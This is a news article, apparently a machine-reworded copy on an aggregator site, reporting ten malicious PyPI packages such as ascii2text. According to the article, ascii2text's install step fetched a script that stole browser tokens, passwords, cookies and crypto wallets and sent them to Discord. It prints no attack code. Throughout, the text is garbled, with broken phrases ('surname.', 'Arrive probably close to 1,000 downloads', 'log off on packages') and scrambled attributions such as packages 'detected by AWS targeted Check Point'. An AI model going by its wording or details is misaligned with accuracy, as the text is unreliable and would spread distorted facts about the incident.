Tech

10 malicious Python packages exposed in latest repository attack


Supply chain attacks, like the latest PyPi discovery, insert malicious code into seemingly functional software packages used by developers.  They are becoming more and more popular.
Enlarge / Supply chain attacks, like the latest PyPi discovery, insert malicious code into seemingly functional software packages used by developers. They are becoming more and more popular.

beautiful pictures

Researchers have discovered a set of malicious packages in PyPi, the official and most popular repository for Python programs and code libraries. Those tricked by seemingly familiar packages can be tricked into downloading malware or stealing user logins and passwords.

Check Point Study, reported its findings on Monday, writes that it is unknown how many people have downloaded the 10 packages, but notes that PyPi has 613,000 active users and its code is used in more than 390,000 projects. Install from PyPi via pip command is a basic step for starting or setting up many Python projects. PePya Python project download estimation website, showing that most of the malicious packages had hundreds of downloads.

As supply chain attacks is becoming more and more popular, especially among the open source software repositories that support a lot of software in the world. Python’s repository is a frequent target, with researchers finding malicious packages in September 2017; June, Julyand November In 2021; and June of this year. But trick packs have also been found in RubyGems in 2020, NPM in December 2021and many other open source repositories.

Most notably, a private source supply chain attack by Russian hackers via SolarWinds business software destroyed remarkable devastationled to the infection of more than 100 companies and at least 9 US federal agencies, consists of National Nuclear Security Administration, Internal Revenue Service, Department of State, and Department of Homeland Security.

The increasingly common discovery of rogue, malicious packages is moving repositories to take action. Just yesterday, GitHub, the owner of the NPM repository for JavaScript packages, opened a request for comment on providing an opt-in system for package developers to sign and verify their packages. surname. Use Sigstorean open source and industry group collaboration, NPM developers can log off on packages, signaling that the code within them matches their original repository.

Having a clear indication that the package you’re downloading is related to the code you need may have helped people avoid the most recently discovered PyPi bad actors, though perhaps not entirely. “Ascii2text” directly copied almost every aspect of the ASCII art library “art”, minus the release details. Arrive probably close to 1,000 downloadsIts descriptive name may suggest a more defined purpose than “art”.

Installing ascii2text triggered a malicious script download, which then searched the local storage of Opera, Chrome, and other browsers for tokens, passwords, or cookies, along with some crypto wallets. certain elements and send them to the Discord server.

Malicious script inside misleading Python asciii2text package, detected by Check Point Software.
Enlarge / Malicious script inside misleading Python asciii2text package, detected by Check Point Software.

Other packages detected by AWS targeted Check Point and other logins and environment variables. Here is the list of PyPi packages reported and since removed:

  • ascii2text
  • pyg-utils
  • pymocks
  • PyProto2
  • test-async
  • free-net-vpn
  • free-net-vpn2
  • zlibsrc
  • browserdiv
  • WINRPCexploit



Source link

news5s

News5s: Update the world's latest breaking news online of the day, breaking news, politics, society today, international mainstream news .Updated news 24/7: Entertainment, Sports...at the World everyday world. Hot news, images, video clips that are updated quickly and reliably

Related Articles

Back to top button